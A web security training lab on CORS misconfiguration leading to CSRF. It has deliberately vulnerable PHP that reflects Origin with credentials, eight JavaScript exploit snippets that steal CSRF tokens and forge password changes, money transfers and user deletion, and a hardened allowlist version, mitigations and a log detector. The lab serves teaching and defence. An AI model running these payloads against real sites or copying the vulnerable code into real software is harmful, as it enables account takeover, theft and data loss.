Lab 5: CORS with CSRF

CORS vulnerabilities leading to CSRF attacks

Difficulty: High

Lab Overview

This lab demonstrates how a CORS misconfiguration turns an ordinary cross-site request into a working Cross-Site Request Forgery (CSRF) attack. A browser already attaches the victim's cookies to a cross-origin request made with credentials: 'include'; what normally protects the application is that the attacker's page cannot read the response, so an anti-CSRF token stays out of reach and any custom request header triggers a preflight the server can refuse. When the server reflects the request's Origin into Access-Control-Allow-Origin, answers preflights for every method and header, and also sends Access-Control-Allow-Credentials: true, a malicious site can read authenticated responses, harvest the CSRF token and any exposed headers, and then submit state-changing requests that pass the server's own checks.

Objective: Exploit CORS vulnerabilities to perform CSRF attacks and unauthorized actions.

Vulnerable CORS Headers
// Vulnerable: CORS with CSRF vulnerabilities
function set_cors_headers() {
    $origin = $_SERVER['HTTP_ORIGIN'] ?? '*';
    
    // Vulnerable: Accept any origin with credentials
    header("Access-Control-Allow-Origin: $origin");
    header("Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS, PATCH, HEAD");
    header("Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With, X-Custom-Header, X-CSRF-Token");
    header("Access-Control-Allow-Credentials: true");
    header("Access-Control-Expose-Headers: X-Sensitive-Data, X-API-Key, X-User-Info, X-Admin-Key, X-CSRF-Token");
    header("Access-Control-Max-Age: 86400");
    
    // Handle preflight requests
    if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {
        http_response_code(200);
        exit();
    }
}
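The lab's set_cors_headers() reduced to a pure function and placed next to a hardened version, as an added example in Node.js that is not part of the lab's own code. The hostnames in the allowlist are assumptions; the point is the exact-match check, the absence of any Access-Control-Allow-Origin header for an untrusted origin, and a preflight that rejects methods and headers outside the allowlist. browserAllowsCredentialedRead() mirrors the rule a browser applies before it lets cross-origin JavaScript read a credentialed response.

```javascript
// Added example (not the lab's code): vulnerable origin reflection beside
// an allowlist-based policy. Origins below are assumed for illustration.

const ALLOWED_ORIGINS = new Set([
  'https://app.example.com',   // assumed first-party front end
  'https://admin.example.com', // assumed admin UI
]);
const ALLOWED_METHODS = ['GET', 'POST', 'OPTIONS'];
const ALLOWED_HEADERS = ['content-type', 'x-csrf-token'];

// Vulnerable: mirrors whatever Origin the browser sent and still grants
// credentials, so any site can read the victim's authenticated responses.
function vulnerableCorsHeaders(origin) {
  return {
    'Access-Control-Allow-Origin': origin ?? '*',
    'Access-Control-Allow-Credentials': 'true',
    'Access-Control-Allow-Methods': 'GET, POST, PUT, DELETE, OPTIONS, PATCH, HEAD',
    'Access-Control-Allow-Headers': 'Content-Type, Authorization, X-CSRF-Token',
  };
}

// Hardened: exact string match against a fixed allowlist. No startsWith(),
// endsWith() or regex, the "null" origin is never trusted, and Vary: Origin
// stops a cache from serving one origin's ACAO value to another.
function hardenedCorsHeaders(origin) {
  const headers = { Vary: 'Origin' };
  if (typeof origin !== 'string' || !ALLOWED_ORIGINS.has(origin)) {
    return headers; // no ACAO at all: the browser blocks the cross-origin read
  }
  headers['Access-Control-Allow-Origin'] = origin;
  headers['Access-Control-Allow-Credentials'] = 'true';
  headers['Access-Control-Allow-Methods'] = ALLOWED_METHODS.join(', ');
  headers['Access-Control-Allow-Headers'] = 'Content-Type, X-CSRF-Token';
  headers['Access-Control-Max-Age'] = '600';
  return headers;
}

// Preflight decision under the hardened policy: the browser announces the
// method and header names it wants to use; anything not allowlisted is refused.
function hardenedPreflight(origin, requestMethod, requestHeaders = '') {
  const headers = hardenedCorsHeaders(origin);
  if (!headers['Access-Control-Allow-Origin']) return { status: 403, headers };
  const method = String(requestMethod ?? '').toUpperCase();
  const wanted = requestHeaders.split(',').map(h => h.trim().toLowerCase()).filter(Boolean);
  const ok = ALLOWED_METHODS.includes(method) && wanted.every(h => ALLOWED_HEADERS.includes(h));
  return { status: ok ? 204 : 403, headers };
}

// The browser-side rule: cross-origin JavaScript at `origin` may read a
// credentialed response only if ACAO equals that origin exactly ("*" is
// refused with credentials) and Access-Control-Allow-Credentials is "true".
function browserAllowsCredentialedRead(origin, headers) {
  const acao = headers['Access-Control-Allow-Origin'];
  const acac = headers['Access-Control-Allow-Credentials'];
  return acao === origin && acac === 'true';
}

// Stand-alone demonstration
const evil = 'https://evil.example'; // assumed attacker origin
console.log('vulnerable readable by evil:',
  browserAllowsCredentialedRead(evil, vulnerableCorsHeaders(evil)));
console.log('hardened readable by evil:',
  browserAllowsCredentialedRead(evil, hardenedCorsHeaders(evil)));
console.log('preflight DELETE from app:',
  hardenedPreflight('https://app.example.com', 'DELETE').status);
```

Note that the hardened version deliberately sends no Access-Control-Allow-Origin header at all on a mismatch rather than a fixed "safe" value: the browser then treats the response as opaque, which is the behaviour the lab's reflection defeats.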
CORS CSRF Tester
⚠️ CORS CSRF Warning

This lab combines the following CORS and CSRF weaknesses:

  • Access-Control-Allow-Credentials: true - cookies and other credentials are accepted on cross-origin requests, so the victim's session rides along with the attacker's fetch
  • Access-Control-Allow-Origin: $origin - reflects whatever Origin the browser sent, so every site is trusted (browsers refuse a literal * together with credentials; reflection is how that restriction is bypassed)
  • No CSRF validation - state-changing actions are not protected by a token the attacker cannot obtain; the token the API does hand out is served by ?action=csrf_test, where the CORS bug lets any origin read it, and X-CSRF-Token is even listed in Access-Control-Allow-Headers so the preflight passes
  • Exposed headers - Access-Control-Expose-Headers lets cross-origin JavaScript read X-Sensitive-Data, X-API-Key, X-User-Info, X-Admin-Key and X-CSRF-Token from the response
CSRF API Endpoints

Try these CSRF endpoints:

  • ?action=csrf_test - CSRF test data
  • ?action=user_profile - User profile data
  • ?action=admin_panel - Admin panel data
Vulnerability Details
  • Type: CORS with CSRF
  • Severity: Critical
  • Method: GET/POST
  • Issue: CORS leading to CSRF
Attack Vectors
  • CSRF Attacks: Unauthorized actions
  • Data Theft: Steal sensitive data
  • Account Takeover: Change passwords
  • Financial Fraud: Transfer money
CORS CSRF Exploitation Examples

Use these techniques to exploit CORS vulnerabilities for CSRF attacks. Each snippet runs on the attacker's page in the victim's browser: credentials: 'include' attaches the victim's session cookie, the reflected Origin lets the page read the response, and the harvested token is replayed on the state-changing request.

1. Basic CORS CSRF Attack:
// Basic CORS CSRF attack: read the token cross-origin, then use it
fetch('http://vulnerable-site.com/api?action=csrf_test', {
    method: 'GET',
    credentials: 'include',   // send the victim's session cookie
    mode: 'cors',
    headers: {
        'Content-Type': 'application/json',
        'X-Custom-Header': 'malicious-value'   // custom header forces a preflight, which the lab answers 200
    }
})
.then(response => response.json())
.then(data => {
    console.log('CSRF data stolen:', data);
    // Extract the CSRF token and any other secrets from the readable response
    const csrfToken = data.csrf_token;
    const apiKey = data.api_key;
    const adminToken = data.admin_token;
    // Perform the CSRF attack with the harvested token
    fetch('http://vulnerable-site.com/api', {
        method: 'POST',
        credentials: 'include',
        mode: 'cors',
        headers: {
            'Content-Type': 'application/json',
            'X-CSRF-Token': csrfToken
        },
        body: JSON.stringify({ action: 'update_profile', email: 'attacker@evil.com' })
    });
});
2. Password Change CSRF:
// Password change CSRF attack
fetch('http://vulnerable-site.com/api?action=user_profile', {
    method: 'GET',
    credentials: 'include',
    mode: 'cors'
})
.then(response => response.json())
.then(data => {
    console.log('User profile stolen:', data);
    // Extract the CSRF token
    const csrfToken = data.csrf_token;
    // Perform the password change CSRF
    fetch('http://vulnerable-site.com/api', {
        method: 'POST',
        credentials: 'include',
        mode: 'cors',
        headers: {
            'Content-Type': 'application/json',
            'X-CSRF-Token': csrfToken
        },
        body: JSON.stringify({ action: 'change_password', new_password: 'attacker_password_123' })
    });
});
3. Money Transfer CSRF:
// Money transfer CSRF attack
fetch('http://vulnerable-site.com/api?action=user_profile', {
    method: 'GET',
    credentials: 'include',
    mode: 'cors'
})
.then(response => response.json())
.then(data => {
    console.log('User profile stolen:', data);
    // Extract the CSRF token
    const csrfToken = data.csrf_token;
    // Perform the money transfer CSRF
    fetch('http://vulnerable-site.com/api', {
        method: 'POST',
        credentials: 'include',
        mode: 'cors',
        headers: {
            'Content-Type': 'application/json',
            'X-CSRF-Token': csrfToken
        },
        body: JSON.stringify({ action: 'transfer_money', amount: 10000, to_account: 'attacker-account-12345' })
    });
});
4. Admin Action CSRF:
// Admin action CSRF attack
fetch('http://vulnerable-site.com/api?action=admin_panel', {
    method: 'GET',
    credentials: 'include',
    mode: 'cors'
})
.then(response => response.json())
.then(data => {
    console.log('Admin data stolen:', data);
    // Extract the CSRF token and the admin token
    const csrfToken = data.csrf_token;
    const adminToken = data.admin_token;
    // Perform the admin action CSRF (Authorization is in the lab's Allow-Headers, so the preflight passes)
    fetch('http://vulnerable-site.com/api', {
        method: 'POST',
        credentials: 'include',
        mode: 'cors',
        headers: {
            'Content-Type': 'application/json',
            'X-CSRF-Token': csrfToken,
            'Authorization': 'Bearer ' + adminToken
        },
        body: JSON.stringify({ action: 'admin_action', command: 'delete_all_users' })
    });
});
5. Account Deletion CSRF:
// Account deletion CSRF attack
fetch('http://vulnerable-site.com/api?action=user_profile', {
    method: 'GET',
    credentials: 'include',
    mode: 'cors'
})
.then(response => response.json())
.then(data => {
    console.log('User profile stolen:', data);
    // Extract the CSRF token
    const csrfToken = data.csrf_token;
    // Perform the account deletion CSRF
    fetch('http://vulnerable-site.com/api', {
        method: 'POST',
        credentials: 'include',
        mode: 'cors',
        headers: {
            'Content-Type': 'application/json',
            'X-CSRF-Token': csrfToken
        },
        body: JSON.stringify({ action: 'delete_account', confirm: true })
    });
});
6. Advanced CORS CSRF with Headers:
// Advanced CORS CSRF: also harvest the response headers the lab exposes.
// Only headers listed in the lab's Access-Control-Allow-Headers may be sent;
// X-Forwarded-For / X-Real-IP are not listed, so the browser would fail the
// preflight if they were added here.
fetch('http://vulnerable-site.com/api?action=csrf_test', {
    method: 'GET',
    credentials: 'include',
    mode: 'cors',
    headers: {
        'Content-Type': 'application/json',
        'X-Custom-Header': 'malicious-value'
    }
})
.then(response => {
    // Read the headers listed in Access-Control-Expose-Headers
    const sensitiveData = response.headers.get('X-Sensitive-Data');
    const apiKey = response.headers.get('X-API-Key');
    const userInfo = response.headers.get('X-User-Info');
    const adminKey = response.headers.get('X-Admin-Key');
    const csrfToken = response.headers.get('X-CSRF-Token');
    console.log('Exposed headers:', { sensitiveData, apiKey, userInfo, adminKey, csrfToken });
    return response.json();
})
.then(data => {
    console.log('CSRF data with headers:', data);
    // Perform the CSRF attack with the harvested token
    fetch('http://vulnerable-site.com/api', {
        method: 'POST',
        credentials: 'include',
        mode: 'cors',
        headers: {
            'Content-Type': 'application/json',
            'X-CSRF-Token': data.csrf_token,
            'X-Custom-Header': 'malicious-value'
        },
        body: JSON.stringify({ action: 'update_profile', email: 'attacker@evil.com' })
    });
});
7. Real-time CSRF Monitoring:
// Real-time CSRF monitoring: re-read the token and replay while the victim's tab stays open
setInterval(() => {
    fetch('http://vulnerable-site.com/api?action=csrf_test', {
        method: 'GET',
        credentials: 'include',
        mode: 'cors'
    })
    .then(response => response.json())
    .then(data => {
        console.log('Real-time CSRF data:', data);
        // Perform the CSRF attack with the freshest token
        fetch('http://vulnerable-site.com/api', {
            method: 'POST',
            credentials: 'include',
            mode: 'cors',
            headers: {
                'Content-Type': 'application/json',
                'X-CSRF-Token': data.csrf_token
            },
            body: JSON.stringify({ action: 'update_profile', last_activity: new Date().toISOString() })
        });
    });
}, 30000); // Every 30 seconds
8. Advanced CORS CSRF Combination:
// Advanced CORS CSRF combination: one token read, several forged actions
async function advancedCORSCSRF() {
    try {
        // First, get the CSRF token and sensitive data
        const response = await fetch('http://vulnerable-site.com/api?action=csrf_test', {
            method: 'GET',
            credentials: 'include',
            mode: 'cors',
            headers: {
                'Content-Type': 'application/json',
                'X-Custom-Header': 'malicious-value'
            }
        });
        const data = await response.json();
        const csrfToken = data.csrf_token;
        const apiKey = data.api_key;
        const adminToken = data.admin_token;
        console.log('Stolen data:', data);

        // Perform multiple CSRF attacks in sequence
        const csrfAttacks = [
            { action: 'update_profile', email: 'attacker@evil.com' },
            { action: 'change_password', new_password: 'attacker_password_123' },
            { action: 'transfer_money', amount: 10000, to_account: 'attacker-account-12345' },
            { action: 'admin_action', command: 'delete_all_users' }
        ];
        for (const attack of csrfAttacks) {
            try {
                await fetch('http://vulnerable-site.com/api', {
                    method: 'POST',
                    credentials: 'include',
                    mode: 'cors',
                    headers: {
                        'Content-Type': 'application/json',
                        'X-CSRF-Token': csrfToken,
                        'Authorization': 'Bearer ' + apiKey
                    },
                    body: JSON.stringify(attack)
                });
                console.log('CSRF attack successful:', attack);
            } catch (error) {
                console.error('CSRF attack failed:', attack, error);
            }
        }
    } catch (error) {
        console.error('Advanced CORS CSRF failed:', error);
    }
}
advancedCORSCSRF();
Mitigation Strategies
  • Never reflect the request's Origin into Access-Control-Allow-Origin; compare it by exact string match against a short allowlist of trusted origins and send no Access-Control-Allow-Origin header at all for anything else (a wildcard * is refused by browsers when credentials are allowed, and prefix, suffix or unanchored regex matching lets origins such as https://app.example.com.evil.net through)
  • Send Access-Control-Allow-Credentials: true only for allowlisted origins, and add Vary: Origin so caches do not hand one origin's response to another
  • Keep Access-Control-Allow-Methods and Access-Control-Allow-Headers to the minimum the front end actually uses, and audit Access-Control-Expose-Headers: never expose API keys, admin keys or CSRF tokens in response headers
  • Validate the anti-CSRF token on every state-changing request, and do not serve it from an endpoint that cross-origin JavaScript can read; a token any origin can fetch protects nothing
  • Set SameSite=Lax or Strict (plus Secure and HttpOnly) on session cookies so the browser withholds them from cross-site requests
  • Enforce authentication and authorization on each action server-side, not only on the page that links to it; add rate limiting and request validation
  • Use Content Security Policy on the application's own pages to limit injected scripts and connect-src destinations; CSP on the victim site does not stop a request from the attacker's site, so treat it as defence in depth, not as the fix
  • Monitor logs for responses whose Access-Control-Allow-Origin mirrors an unknown Origin, and include CORS configuration in regular security testing and vulnerability assessments
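A detection pass for the monitoring point above, as an added example that is not part of the lab. It assumes the web server logs the Origin request header and the Access-Control-Allow-Origin / Access-Control-Allow-Credentials response headers (with Apache, for instance, via %{Origin}i, %{Access-Control-Allow-Origin}o and %{Access-Control-Allow-Credentials}o in a LogFormat); the line layout, the trusted origin and the sample log lines are constructed for illustration and the regex should be adapted to the real format.

```javascript
// Added example (not the lab's code): flag responses that echoed an
// untrusted Origin into ACAO while also allowing credentials, which is
// exactly the condition that lets another site read authenticated data.

const TRUSTED_ORIGINS = new Set(['https://app.example.com']); // assumed

// Constructed sample log: method path status origin acao acac
const SAMPLE_LOG = `
GET /api?action=csrf_test 200 origin="https://app.example.com" acao="https://app.example.com" acac="true"
GET /api?action=user_profile 200 origin="https://evil.example" acao="https://evil.example" acac="true"
OPTIONS /api 200 origin="https://attacker.test" acao="https://attacker.test" acac="true"
GET /api?action=admin_panel 200 origin="-" acao="*" acac="true"
POST /api 200 origin="https://evil.example" acao="-" acac="-"
`.trim();

// Assumed log line layout; "-" marks an absent header
const LINE_RE = /^(\S+) (\S+) (\d{3}) origin="([^"]*)" acao="([^"]*)" acac="([^"]*)"$/;

function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  const [, method, path, status, origin, acao, acac] = m;
  return { method, path, status: Number(status), origin, acao, acac };
}

// A credentialed cross-origin read by an untrusted site: the server
// mirrored a non-trusted Origin into ACAO and allowed credentials.
// A bare "*" is not flagged because browsers refuse it with credentials.
function isReflectedUntrusted(entry) {
  if (entry.origin === '-' || entry.acao === '-') return false;
  return entry.acao === entry.origin
    && entry.acac === 'true'
    && !TRUSTED_ORIGINS.has(entry.origin);
}

function findReflections(logText) {
  return logText.split('\n').map(parseLine).filter(Boolean).filter(isReflectedUntrusted);
}

// Which origins abused the misconfiguration, and how often
function offendingOrigins(logText) {
  const counts = {};
  for (const e of findReflections(logText)) {
    counts[e.origin] = (counts[e.origin] || 0) + 1;
  }
  return counts;
}

// Stand-alone run over the constructed sample
for (const hit of findReflections(SAMPLE_LOG)) {
  console.log(`reflected untrusted origin ${hit.origin} on ${hit.method} ${hit.path}`);
}
console.log(offendingOrigins(SAMPLE_LOG));
```

The last sample line is deliberately not flagged: a POST that receives no Access-Control-Allow-Origin still reaches the server with the victim's cookies if the request is a simple one, so CORS logging detects the readable-response side of this attack, not CSRF in general; the SameSite and token mitigations above cover the rest.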